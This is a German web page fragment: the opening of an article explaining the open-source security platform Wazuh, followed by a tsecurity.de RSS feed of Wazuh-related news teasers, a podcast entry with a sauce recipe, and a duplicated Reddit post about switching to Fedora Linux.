<p>Dieser Artikel untersucht die Open-Source-Sicherheitsplattform Wazuh und beantwortet drei wichtige Fragen zu ihrer Funktionsweise, ihren Einsatzmöglichkeiten und ihrer zukünftigen Entwicklung. Die Ergebnisse zeigen, dass Wazuh ein leistungsstarkes Werkzeug für die Überwachung und Analyse von Security-Events ist, das sich durch seine Flexibilität und Skalierbarkeit auszeichnet. Es eignet sich insbesondere für Unternehmen, die auf der Suche nach einer kosteneffektiven Lösung sind, um ihre IT-Sicherheit zu verbessern.</p><br />
<p><strong>Einleitung:</strong></p><br />
<p>In der heutigen digitalen Welt ist die IT-Sicherheit ein wichtiger Bestandteil des Geschäftsbetriebs [Kaspersky, 2021]. Unternehmen müssen sich ständig vor Bedrohungen schützen und ihre Sicherheitssysteme auf dem neuesten Stand halten. Eine Möglichkeit, dies zu tun, besteht darin, Open-Source-Sicherheitsplattformen wie Wazuh einzusetzen.</p><br />
<p>Wazuh ist eine Open-Source-Sicherheitsplattform, die entwickelt wurde, um Security-Events in Echtzeit zu überwachen und zu analysieren [Wazuh, 2021]. Sie bietet eine Vielzahl von Funktionen, einschließlich der Überwachung von System- und Netzwerkaktivitäten, der Erkennung von Bedrohungen und der Generierung von Alarmmeldungen. In diesem Artikel werden drei wichtige Fragen zur Open-Source-Sicherheitsplattform Wazuh beantwortet.</p><br />
<p><strong>Frage 1: Wie funktioniert Wazuh?</strong></p><br />
<p>Wazuh basiert auf dem Open-Source-Framework ELK (Elasticsearch, Logstash, Kibana), das für die Verarbeitung und Visualisierung von Daten verwendet wird [ELK Stack, 2021]. Es sammelt System- und Netzwerkaktivitäten, die in Form von Logs vorliegen, und sendet sie an Wazuh, wo sie analysiert werden. Wazuh verwendet eine Vielzahl von Regeln und Anomalieerkennungsmechanismen, um potenzielle Bedrohungen zu erkennen und Alarmmeldungen zu generieren [Wazuh, 2021].</p><br />
<p>Die Funktion</p><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[Drei Fragen, drei Antworten: Die Open-Source-Securityplattform Wazuh]]></title>
<description><![CDATA[Mit Wazuh steht eine umfangreiche Open-Source-Sicherheitsplattform zum Schutz der Firma bereit. Wir erklären die Einsatzmöglichkeiten und die beste Strategie.]]></description>
<link>https://tsecurity.de/de/2507045/it-nachrichten/drei-fragen-drei-antworten-die-open-source-securityplattform-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2507045/it-nachrichten/drei-fragen-drei-antworten-die-open-source-securityplattform-wazuh/</guid>
<pubDate>Thu, 19 Dec 2024 12:15:33 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit Wazuh steht eine umfangreiche Open-Source-Sicherheitsplattform zum Schutz der Firma bereit. Wir erklären die Einsatzmöglichkeiten und die beste Strategie.]]></content:encoded>
</item>
<item>
<title><![CDATA[heise+ | Wazuh: Freie Sicherheitsplattform im Einsatz]]></title>
<description><![CDATA[Wazuh bietet Monitoring, XDR und SIEM ohne Lizenzkosten, die Vielzahl der Funktionen erschwert den Einstieg. Wir zeigen, wie man die IT-Infrastruktur schützt.]]></description>
<link>https://tsecurity.de/de/2502463/it-nachrichten/heise-wazuh-freie-sicherheitsplattform-im-einsatz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2502463/it-nachrichten/heise-wazuh-freie-sicherheitsplattform-im-einsatz/</guid>
<pubDate>Tue, 17 Dec 2024 10:30:30 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wazuh bietet Monitoring, XDR und SIEM ohne Lizenzkosten, die Vielzahl der Funktionen erschwert den Einstieg. Wir zeigen, wie man die IT-Infrastruktur schützt.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh: Freie Sicherheitsplattform im Einsatz | heise online]]></title>
<description><![CDATA[Wazuh ist eine lizenzkostenfreie und quelloffene Sicherheitsplattform, die Extended Detection and Response (XDR) und Security Information and Event ...]]></description>
<link>https://tsecurity.de/de/2496478/it-security-nachrichten/wazuh-freie-sicherheitsplattform-im-einsatz-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2496478/it-security-nachrichten/wazuh-freie-sicherheitsplattform-im-einsatz-heise-online/</guid>
<pubDate>Fri, 13 Dec 2024 14:49:01 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wazuh ist eine lizenzkostenfreie und quelloffene Sicherheitsplattform, die Extended Detection and Response (XDR) und <b>Security</b> Information and Event ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Latrodectus malware and how to defend against it with Wazuh]]></title>
<description><![CDATA[Latrodectus is a versatile malware family that infiltrate systems, steal sensitive data, and evades detection. Learn more from Wazuh about Latrodectus malware and how to defend against it using the open-source XDR. [...]]]></description>
<link>https://tsecurity.de/de/2481772/it-security-nachrichten/latrodectus-malware-and-how-to-defend-against-it-with-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2481772/it-security-nachrichten/latrodectus-malware-and-how-to-defend-against-it-with-wazuh/</guid>
<pubDate>Thu, 05 Dec 2024 16:49:10 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Latrodectus is a versatile malware family that infiltrate systems, steal sensitive data, and evades detection. Learn more from Wazuh about Latrodectus malware and how to defend against it using the open-source XDR. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Neues Computerstrafrecht: Mehr Schutz für Sicherheitsforscher | heise online]]></title>
<description><![CDATA[Mehr zu IT-Security. Neues Computerstrafrecht: Mehr Schutz für Sicherheitsforscher; Der EU Cyber Resilience Act: Was man wissen muss · Wazuh ...]]></description>
<link>https://tsecurity.de/de/2447455/it-security-nachrichten/neues-computerstrafrecht-mehr-schutz-fuer-sicherheitsforscher-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2447455/it-security-nachrichten/neues-computerstrafrecht-mehr-schutz-fuer-sicherheitsforscher-heise-online/</guid>
<pubDate>Mon, 18 Nov 2024 10:04:00 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mehr zu <b>IT</b>-<b>Security</b>. Neues Computerstrafrecht: Mehr Schutz für Sicherheitsforscher; Der EU Cyber Resilience Act: Was man wissen muss · Wazuh ...]]></content:encoded>
</item>
<item>
<title><![CDATA[heise+ | Wazuh: Unternehmenssicherheit mit Open Source gewährleisten]]></title>
<description><![CDATA[Angesichts ständiger Cyberangriffe ist der Schutz der Firmen-IT-Infrastruktur ein Muss. Die Securityplattform Wazuh vereint Monitoring- und Abwehrfunktionen.]]></description>
<link>https://tsecurity.de/de/2437487/it-nachrichten/heise-wazuh-unternehmenssicherheit-mit-open-source-gewaehrleisten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2437487/it-nachrichten/heise-wazuh-unternehmenssicherheit-mit-open-source-gewaehrleisten/</guid>
<pubDate>Tue, 12 Nov 2024 13:45:51 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Angesichts ständiger Cyberangriffe ist der Schutz der Firmen-IT-Infrastruktur ein Muss. Die Securityplattform Wazuh vereint Monitoring- und Abwehrfunktionen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh: Unternehmenssicherheit mit Open Source gewährleisten | heise online]]></title>
<description><![CDATA[Angesichts ständiger Cyberangriffe ist der Schutz der Firmen-IT-Infrastruktur ein Muss. Die Securityplattform Wazuh vereint Monitoring- und ...]]></description>
<link>https://tsecurity.de/de/2434762/it-security-nachrichten/wazuh-unternehmenssicherheit-mit-open-source-gewaehrleisten-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2434762/it-security-nachrichten/wazuh-unternehmenssicherheit-mit-open-source-gewaehrleisten-heise-online/</guid>
<pubDate>Mon, 11 Nov 2024 09:03:18 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Angesichts ständiger Cyberangriffe ist der Schutz der Firmen-<b>IT</b>-Infrastruktur ein Muss. Die Securityplattform Wazuh vereint Monitoring- und ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Leveraging Wazuh for Zero Trust security]]></title>
<description><![CDATA[Zero Trust security changes how organizations handle security by doing away with implicit trust while continuously analyzing and validating access requests. Contrary to perimeter-based security, users within an environment are not automatically trusted upon gaining access. Zero Trust security enc...]]></description>
<link>https://tsecurity.de/de/2425131/it-security-nachrichten/leveraging-wazuh-for-zero-trust-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2425131/it-security-nachrichten/leveraging-wazuh-for-zero-trust-security/</guid>
<pubDate>Tue, 05 Nov 2024 12:04:11 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Zero Trust security changes how organizations handle security by doing away with implicit trust while continuously analyzing and validating access requests. Contrary to perimeter-based security, users within an environment are not automatically trusted upon gaining access. Zero Trust security encourages continuous monitoring of every device and user, which ensures sustained protection after]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4226: JAMBOREE and Taco Bell!]]></title>
<description><![CDATA[JAMBOREE.rmccurdy.com :
SOCFortress CoPilot / Velociraptor / Wazuh
Copycat Taco Bell Quesadilla
Sauce
PREP TIME
5 minutes

TOTAL TIME
5 minutes

Ingredients
½ cup mayonnaise
½ cup sour cream
3 Tablespoons pickled jalapeno juice (from a jar of pickled jalapenos)
3 Tablespoons pickled jalapenos (di...]]></description>
<link>https://tsecurity.de/de/2383896/podcasts/hpr4226-jamboree-and-taco-bell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2383896/podcasts/hpr4226-jamboree-and-taco-bell/</guid>
<pubDate>Mon, 14 Oct 2024 02:04:32 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://jamboree.rmccurdy.com/">JAMBOREE.rmccurdy.com</a> :
SOCFortress CoPilot / Velociraptor / Wazuh</p>
<h3>Copycat Taco Bell Quesadilla
Sauce</h3>
<pre><code>PREP TIME
5 minutes

TOTAL TIME
5 minutes

Ingredients
½ cup mayonnaise
½ cup sour cream
3 Tablespoons pickled jalapeno juice (from a jar of pickled jalapenos)
3 Tablespoons pickled jalapenos (diced)
2 teaspoon paprika
2 teaspoons ground cumin
1 teaspoon garlic granules
1 teaspoon onion powder
½ teaspoon salt (or to taste)
½ teaspoon chili powder</code></pre>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4226: JAMBOREE and Taco Bell!]]></title>
<description><![CDATA[JAMBOREE.rmccurdy.com :
SOCFortress CoPilot / Velociraptor / Wazuh
Copycat Taco Bell Quesadilla
Sauce
PREP TIME
5 minutes

TOTAL TIME
5 minutes

Ingredients
½ cup mayonnaise
½ cup sour cream
3 Tablespoons pickled jalapeno juice (from a jar of pickled jalapenos)
3 Tablespoons pickled jalapenos (di...]]></description>
<link>https://tsecurity.de/de/2383895/podcasts/hpr4226-jamboree-and-taco-bell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2383895/podcasts/hpr4226-jamboree-and-taco-bell/</guid>
<pubDate>Mon, 14 Oct 2024 02:04:31 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://jamboree.rmccurdy.com/">JAMBOREE.rmccurdy.com</a> :
SOCFortress CoPilot / Velociraptor / Wazuh</p>
<h3>Copycat Taco Bell Quesadilla
Sauce</h3>
<pre><code>PREP TIME
5 minutes

TOTAL TIME
5 minutes

Ingredients
½ cup mayonnaise
½ cup sour cream
3 Tablespoons pickled jalapeno juice (from a jar of pickled jalapenos)
3 Tablespoons pickled jalapenos (diced)
2 teaspoon paprika
2 teaspoons ground cumin
1 teaspoon garlic granules
1 teaspoon onion powder
½ teaspoon salt (or to taste)
½ teaspoon chili powder</code></pre>]]></content:encoded>
</item>
<item>
<title><![CDATA[How open source SIEM and XDR tackle evolving threats]]></title>
<description><![CDATA[Evolving threats require security solutions that match the sophistication of modern threats. Learn more about how Wazuh, the open-source XDR and SIEM, tackles these threats. [...]]]></description>
<link>https://tsecurity.de/de/2377179/it-security-nachrichten/how-open-source-siem-and-xdr-tackle-evolving-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2377179/it-security-nachrichten/how-open-source-siem-and-xdr-tackle-evolving-threats/</guid>
<pubDate>Wed, 09 Oct 2024 18:18:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Evolving threats require security solutions that match the sophistication of modern threats. Learn more about how Wazuh, the open-source XDR and SIEM, tackles these threats. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Scam Information and Event Management]]></title>
<description><![CDATA[Malicious actors are spreading miners through fake websites with popular software, Telegram channels and YouTube, installing Wazuh SIEM agent on victims' devices for persistence.]]></description>
<link>https://tsecurity.de/de/2367724/malware-trojaner-viren/scam-information-and-event-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2367724/malware-trojaner-viren/scam-information-and-event-management/</guid>
<pubDate>Fri, 04 Oct 2024 10:46:12 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Malicious actors are spreading miners through fake websites with popular software, Telegram channels and YouTube, installing Wazuh SIEM agent on victims' devices for persistence.]]></content:encoded>
</item>
<item>
<title><![CDATA[Enhancing Incident Response Readiness with Wazuh]]></title>
<description><![CDATA[Incident response is a structured approach to managing and addressing security breaches or cyber-attacks. Security teams must overcome challenges such as timely detection, comprehensive data collection, and coordinated actions to enhance readiness. Improving these areas ensures a swift and effect...]]></description>
<link>https://tsecurity.de/de/2262640/it-security-nachrichten/enhancing-incident-response-readiness-with-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2262640/it-security-nachrichten/enhancing-incident-response-readiness-with-wazuh/</guid>
<pubDate>Mon, 05 Aug 2024 12:35:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Incident response is a structured approach to managing and addressing security breaches or cyber-attacks. Security teams must overcome challenges such as timely detection, comprehensive data collection, and coordinated actions to enhance readiness. Improving these areas ensures a swift and effective response, minimizing damage and restoring normal operations quickly.
Challenges in incident]]></content:encoded>
</item>
<item>
<title><![CDATA[A middle-aged man tried Linux desktop]]></title>
<description><![CDATA[I'd like to share my experiences after trying Linux ecosystem with Fedora as my main computer, after a a life of mostly Windows and Mac. This was a summer project for me. My situation is somewhat unusual as I am both a Clinical Psychologist and the CTO of an electronic health-journal company. My ...]]></description>
<link>https://tsecurity.de/de/2256814/linux-tipps/a-middle-aged-man-tried-linux-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2256814/linux-tipps/a-middle-aged-man-tried-linux-desktop/</guid>
<pubDate>Thu, 01 Aug 2024 11:31:10 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I'd like to share my experiences after trying Linux ecosystem with Fedora as my main computer, after a a life of mostly Windows and Mac. This was a summer project for me. My situation is somewhat unusual as I am both a Clinical Psychologist and the CTO of an electronic health-journal company. My work ranges from providing Cognitive Behavioral Therapy: CBT to CLI! (an attempt at joke was made!).</p> <p>I am 42 years old and have tried Linux a bit in the past, and know enough to set up a Nginx server on AWS EC2 going in to this. I never ran Linux as my daily driver before. I love to game in my spare time, so this is an important consideration for me.</p> <p>I would greatly appreciate any suggestions or insights, particularly concerning the features I found to be missing – perhaps I've overlooked something.</p> <p>After some research i decided to go with Fedora, as it seems to be a good combination of speed, stability, support, documentation and userfriendliness.</p> <p>Positive Aspects:</p> <ul> <li>Linux gives me a pleasantly satisfying sensation; there's an inherent appeal for me. Functionality is generally reliable, and when issues do arise, I often feel capable of addressing them. This contrasts with my experiences on Windows or Mac, where I sometimes hit a wall and can't find a way to resolve problems.</li> <li>Hardware compatibility is superb – Bluetooth, wireless, webcam, sound, all work seamlessly. This includes a new gaming laptop equipped with an RTX 4060, AMD Ryzen 7 7840HS, 32GB RAM, and a 1.5TB hard drive.</li> <li>My Pixel Buds Bluetooth earpieces functioned flawlessly straight out of the box.</li> <li>I've been using GeForce NOW through a Chromium PWA without issue, although it's limited to 60 FPS, and I haven't pursued higher frame rates though dedicated packages.</li> <li>Configuring an Nginx Reverse Proxy and an array of self-hosted Docker services was remarkably simple. My current setup includes a customized Django webpage, Jellyfin, Filebrowser, Librechat with various AI integrations, Immich photos, and a Valheim dedicated server.</li> <li>Steam works remarkably well, and Proton is almost magic.</li> </ul> <p>Challenges:</p> <ul> <li>Firefox has trouble with certain 1080p+ YouTube videos, although this improved after I added more video codecs at the OS level.</li> <li>The uBlock Origin addon for Chromium occasionally crashes in a loop, but this does not happen consistently, but once it starts, its gone.</li> <li>The Files App randomly shuts down, particularly during file renaming.</li> <li>Zed text editor unexpectedly closes without warning (This is a brand new editor for Linux so might be growing pains only). </li> <li>Transmission, a torrent GUI client, Allways crash upon closing.</li> <li>Certain applications, like ClipQ, failed to work, possibly due to X11/Wayland incompatibility.</li> <li>A persistent issue with my network is the ethernet connection will not automatically reestablish after a reboot, necessitating a physical unplugging and replugging, which may be due to Linux since it worked well under Windows.</li> <li>Sadly, Chromium is just plain more stable, faster, and better supported than Firefox. There are so many random bugs, crashes, and weirdness with Firefox. For instance, my first attempt at posting this using Firefox did not work, and Firefox got stuck and couldn't scroll.</li> </ul> <p>Major Missing Features:</p> <ul> <li>Text-to-speech capabilities: Nothing rivals the quality found on macOS. The local text-to-speech engine on my Mac is remarkably clear, responsive, and accurate for both English and Norwegian. Setting up is effortless, making most open-source alternatives pale in comparison. I explored Festival, coqui-ai, eSpeak, and others, but all had significant issues, ranging from installation problems to a lack of Norwegian language support. I resorted to a Python script that chucks the text (to get faster initial response) then sends its to the OpenAI TTS API, which, despite being somewhat cumbersome, outperforms other options I've tried.</li> <li>Speech-to-text: I encountered the same issues; slow or malfunctioning software. APIs form a better solution, especially when compared to Apple inn-line dictation, where you can stop taking, type out a difficult word, then continue talking, without skipping a beat.</li> <li>Automation tools like Keyboard Maestro: I couldn't find any Linux equivalents with comparable functionality. Autohotkey and Gnome Tweaks lack the comprehensive features I am looking for. It should not be complicated to have a service that monitors for a certain keyboard combination, then run custom code.</li> <li>Organization unser management of computer fleets: As a CTO of a small company, I find it perplexing that there isn’t a straightforward Linux tool for managing hardware with active-directory features. Options like Action1 or Wazuh don't satisfy user management needs. Why is not fleet and user management a solved problem by now?</li> </ul> <p>Final Thoughts:</p> <ul> <li>Linux is entirely capable of serving as the primary operating system for most people. Setting up a Fedora system for my family members would be quite feasible, potentially with fewer issues than they might encounter with Windows Home edition (Seriously, screw Microsoft).</li> <li>Self-hosting Nextcloud is still overly complicated; it's far from the "All in One" solution it claims to be, generating more containers and volumes than necessary, is buggy, undocumented and fails with the most important aspect: Backup.</li> <li>The critical need for text-to-speech and speech-to-text services goes beyond personal preferences; they are essential for accessibility. Their absence within the Linux ecosystem is a significant shortcoming if we want to be inclusive. But it is also useful for thous without disabilities. I blow most of my colleagues out of the water with regards to producing text with speech-to-text. I never understood why so few people utilize this immensely powerful tool more. I can easily dictate at 150 words per minute with fewer mistakes compared to when I type at 80 WPM. Also, I can do it while out walking. The same goes for text-to-speech. To me, it's an absolutely essential tool, and I wish it were more popular.</li> <li>In conclusion, given the tremendous progress, Linux is ready for a broader, non-technical audience. This is further encouraged by the current state of Windows and the high cost of Macs.</li> </ul> <p>Thank you for taking the time to read this. I am eager to hear any comments or feedback you might have.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/JonNordland"> /u/JonNordland </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1ehc9o2/a_middleaged_man_tried_linux_desktop/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ehc9o2/a_middleaged_man_tried_linux_desktop/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[A middle-aged man tried Linux desktop]]></title>
<description><![CDATA[I'd like to share my experiences after trying Linux ecosystem with Fedora as my main computer, after a a life of mostly Windows and Mac. This was a summer project for me. My situation is somewhat unusual as I am both a Clinical Psychologist and the CTO of an electronic health-journal company. My ...]]></description>
<link>https://tsecurity.de/de/2256815/linux-tipps/a-middle-aged-man-tried-linux-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2256815/linux-tipps/a-middle-aged-man-tried-linux-desktop/</guid>
<pubDate>Thu, 01 Aug 2024 11:31:10 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I'd like to share my experiences after trying Linux ecosystem with Fedora as my main computer, after a a life of mostly Windows and Mac. This was a summer project for me. My situation is somewhat unusual as I am both a Clinical Psychologist and the CTO of an electronic health-journal company. My work ranges from providing Cognitive Behavioral Therapy: CBT to CLI! (an attempt at joke was made!).</p> <p>I am 42 years old and have tried Linux a bit in the past, and know enough to set up a Nginx server on AWS EC2 going in to this. I never ran Linux as my daily driver before. I love to game in my spare time, so this is an important consideration for me.</p> <p>I would greatly appreciate any suggestions or insights, particularly concerning the features I found to be missing – perhaps I've overlooked something.</p> <p>After some research i decided to go with Fedora, as it seems to be a good combination of speed, stability, support, documentation and userfriendliness.</p> <p>Positive Aspects:</p> <ul> <li>Linux gives me a pleasantly satisfying sensation; there's an inherent appeal for me. Functionality is generally reliable, and when issues do arise, I often feel capable of addressing them. This contrasts with my experiences on Windows or Mac, where I sometimes hit a wall and can't find a way to resolve problems.</li> <li>Hardware compatibility is superb – Bluetooth, wireless, webcam, sound, all work seamlessly. This includes a new gaming laptop equipped with an RTX 4060, AMD Ryzen 7 7840HS, 32GB RAM, and a 1.5TB hard drive.</li> <li>My Pixel Buds Bluetooth earpieces functioned flawlessly straight out of the box.</li> <li>I've been using GeForce NOW through a Chromium PWA without issue, although it's limited to 60 FPS, and I haven't pursued higher frame rates though dedicated packages.</li> <li>Configuring an Nginx Reverse Proxy and an array of self-hosted Docker services was remarkably simple. My current setup includes a customized Django webpage, Jellyfin, Filebrowser, Librechat with various AI integrations, Immich photos, and a Valheim dedicated server.</li> <li>Steam works remarkably well, and Proton is almost magic.</li> </ul> <p>Challenges:</p> <ul> <li>Firefox has trouble with certain 1080p+ YouTube videos, although this improved after I added more video codecs at the OS level.</li> <li>The uBlock Origin addon for Chromium occasionally crashes in a loop, but this does not happen consistently, but once it starts, its gone.</li> <li>The Files App randomly shuts down, particularly during file renaming.</li> <li>Zed text editor unexpectedly closes without warning (This is a brand new editor for Linux so might be growing pains only). </li> <li>Transmission, a torrent GUI client, Allways crash upon closing.</li> <li>Certain applications, like ClipQ, failed to work, possibly due to X11/Wayland incompatibility.</li> <li>A persistent issue with my network is the ethernet connection will not automatically reestablish after a reboot, necessitating a physical unplugging and replugging, which may be due to Linux since it worked well under Windows.</li> <li>Sadly, Chromium is just plain more stable, faster, and better supported than Firefox. There are so many random bugs, crashes, and weirdness with Firefox. For instance, my first attempt at posting this using Firefox did not work, and Firefox got stuck and couldn't scroll.</li> </ul> <p>Major Missing Features:</p> <ul> <li>Text-to-speech capabilities: Nothing rivals the quality found on macOS. The local text-to-speech engine on my Mac is remarkably clear, responsive, and accurate for both English and Norwegian. Setting up is effortless, making most open-source alternatives pale in comparison. I explored Festival, coqui-ai, eSpeak, and others, but all had significant issues, ranging from installation problems to a lack of Norwegian language support. I resorted to a Python script that chucks the text (to get faster initial response) then sends its to the OpenAI TTS API, which, despite being somewhat cumbersome, outperforms other options I've tried.</li> <li>Speech-to-text: I encountered the same issues; slow or malfunctioning software. APIs form a better solution, especially when compared to Apple inn-line dictation, where you can stop taking, type out a difficult word, then continue talking, without skipping a beat.</li> <li>Automation tools like Keyboard Maestro: I couldn't find any Linux equivalents with comparable functionality. Autohotkey and Gnome Tweaks lack the comprehensive features I am looking for. It should not be complicated to have a service that monitors for a certain keyboard combination, then run custom code.</li> <li>Organization unser management of computer fleets: As a CTO of a small company, I find it perplexing that there isn’t a straightforward Linux tool for managing hardware with active-directory features. Options like Action1 or Wazuh don't satisfy user management needs. Why is not fleet and user management a solved problem by now?</li> </ul> <p>Final Thoughts:</p> <ul> <li>Linux is entirely capable of serving as the primary operating system for most people. Setting up a Fedora system for my family members would be quite feasible, potentially with fewer issues than they might encounter with Windows Home edition (Seriously, screw Microsoft).</li> <li>Self-hosting Nextcloud is still overly complicated; it's far from the "All in One" solution it claims to be, generating more containers and volumes than necessary, is buggy, undocumented and fails with the most important aspect: Backup.</li> <li>The critical need for text-to-speech and speech-to-text services goes beyond personal preferences; they are essential for accessibility. Their absence within the Linux ecosystem is a significant shortcoming if we want to be inclusive. But it is also useful for thous without disabilities. I blow most of my colleagues out of the water with regards to producing text with speech-to-text. I never understood why so few people utilize this immensely powerful tool more. I can easily dictate at 150 words per minute with fewer mistakes compared to when I type at 80 WPM. Also, I can do it while out walking. The same goes for text-to-speech. To me, it's an absolutely essential tool, and I wish it were more popular.</li> <li>In conclusion, given the tremendous progress, Linux is ready for a broader, non-technical audience. This is further encouraged by the current state of Windows and the high cost of Macs.</li> </ul> <p>Thank you for taking the time to read this. I am eager to hear any comments or feedback you might have.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/JonNordland"> /u/JonNordland </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1ehc9o2/a_middleaged_man_tried_linux_desktop/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ehc9o2/a_middleaged_man_tried_linux_desktop/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Detecting Living Off The Land attacks with Wazuh]]></title>
<description><![CDATA[Threat actors commonly use Living Off The Land (LOTL) techniques to evade detection. Learn more from Wazuh about how its open source XDR/SIEM #cybersecurity platform can detect LOTL attacks. [...]]]></description>
<link>https://tsecurity.de/de/2228464/it-security-nachrichten/detecting-living-off-the-land-attacks-with-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2228464/it-security-nachrichten/detecting-living-off-the-land-attacks-with-wazuh/</guid>
<pubDate>Mon, 15 Jul 2024 03:50:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Threat actors commonly use Living Off The Land (LOTL) techniques to evade detection. Learn more from Wazuh about how its open source XDR/SIEM #cybersecurity platform can detect LOTL attacks. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Achieve security compliance with Wazuh File Integrity Monitoring]]></title>
<description><![CDATA[File Integrity Monitoring (FIM) is an IT security control that monitors and detects file changes in computer systems. It helps organizations audit important files and system configurations by routinely scanning and verifying their integrity. Most information security standards mandate the use of ...]]></description>
<link>https://tsecurity.de/de/2145236/it-security-nachrichten/achieve-security-compliance-with-wazuh-file-integrity-monitoring/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2145236/it-security-nachrichten/achieve-security-compliance-with-wazuh-file-integrity-monitoring/</guid>
<pubDate>Sun, 12 May 2024 14:51:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[File Integrity Monitoring (FIM) is an IT security control that monitors and detects file changes in computer systems. It helps organizations audit important files and system configurations by routinely scanning and verifying their integrity. Most information security standards mandate the use of FIM for businesses to ensure the integrity of their data.
IT security compliance involves adhering to]]></content:encoded>
</item>
<item>
<title><![CDATA[Achieve security compliance with Wazuh File Integrity Monitoring]]></title>
<description><![CDATA[File Integrity Monitoring (FIM) is an IT security control that monitors and detects file changes in computer systems. It helps organizations audit important files and system configurations by routinely scanning and verifying their integrity. Most information security standards mandate the use of ...]]></description>
<link>https://tsecurity.de/de/2145237/it-security-nachrichten/achieve-security-compliance-with-wazuh-file-integrity-monitoring/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2145237/it-security-nachrichten/achieve-security-compliance-with-wazuh-file-integrity-monitoring/</guid>
<pubDate>Sun, 12 May 2024 14:51:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[File Integrity Monitoring (FIM) is an IT security control that monitors and detects file changes in computer systems. It helps organizations audit important files and system configurations by routinely scanning and verifying their integrity. Most information security standards mandate the use of FIM for businesses to ensure the integrity of their data.
IT security compliance involves adhering to]]></content:encoded>
</item>
<item>
<title><![CDATA[Streamlining IT Security Compliance Using the Wazuh FIM Capability]]></title>
<description><![CDATA[File Integrity Monitoring (FIM) is an IT security control that monitors and detects file changes in computer systems. It helps organizations audit important files and system configurations by routinely scanning and verifying their integrity. Most information security standards mandate the use of ...]]></description>
<link>https://tsecurity.de/de/2142538/it-security-nachrichten/streamlining-it-security-compliance-using-the-wazuh-fim-capability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2142538/it-security-nachrichten/streamlining-it-security-compliance-using-the-wazuh-fim-capability/</guid>
<pubDate>Sat, 11 May 2024 06:29:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
